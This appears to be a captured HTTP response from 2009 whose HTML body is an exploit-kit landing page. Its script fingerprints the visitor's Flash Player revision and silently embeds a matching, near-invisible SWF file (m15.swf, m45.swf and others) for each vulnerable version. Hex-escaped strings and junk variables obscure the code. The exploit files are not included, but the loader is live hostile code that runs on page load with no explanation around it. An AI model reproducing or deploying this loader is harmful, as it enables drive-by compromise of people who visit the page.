HTTP/1.1 200 OK
Content-Length: 1806
ETag: "a87074251a9ac91:299"
Date: Thu, 12 Mar 2009 07:09:07 GMT
Last-Modified: Sun, 01 Mar 2009 03:02:24 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/b094933/mlink.html
X-Polipo-Date: Thu, 12 Mar 2009 07:17:08 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:59 GMT

<Script src="swfobject.js"></Script>  
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script src="flash.js"></script>
<script type="text/javascript">
if(version['major']==9){
	var dffddf="d";
	document.getElementById('flashversion').innerHTML="";
	if(version['rev']==115){
		var fuckavp = "DZ";
		var fuckaxp = "aa";
		var fuckaqp ="c";
		var so=new SWFObject("m1"+"5.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent")
	}else if(version['rev']==45){
		var fqdscc = "P";
		var so=new SWFObject("m45.swf","mymovie","0.1","0.1","9","#000000");
		var wevbhpa = "qrffc";
		so.write("flashcontent")
	}else if(version['rev']==16){
		var so=new SWFObject("m16.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
		
		so=new SWFObject("\x6d\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
		var qwea = "qwecb";
		so.write("flashcontent")
	}else if(version['rev']==28){
		var so=new SWFObject("m28.swf","mymovie","0.1","0.1","9","#000000");var whhjs="h";
		so.write("flashcontent");var dddp="c";
	}else if(version['rev']==47){
		var jys1="\x44\x5a";var lcxxaaqqeed="c";var so=new SWFObject("\x6d"+"\x34\x37\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
		so["\x77\x72\x69\x74\x65"]("\x66\x6c\x61\x73\x68\x63\x6f\x6e\x74\x65\x6e\x74")
	}else if(version['rev']>123){
		if(document.getElementById){
			var fisx="gf";
			document.getElementById('flashversion').innerHTML=""
		}
	}
}
var fkav="BS";var fkaav="BS";var fkasacv="BS";var fkaasacv="BS";var wkaasacv="BS";var lsacv="BS";var dcccccsacv="BS";var chnaxacv="BS";
</ScripT>  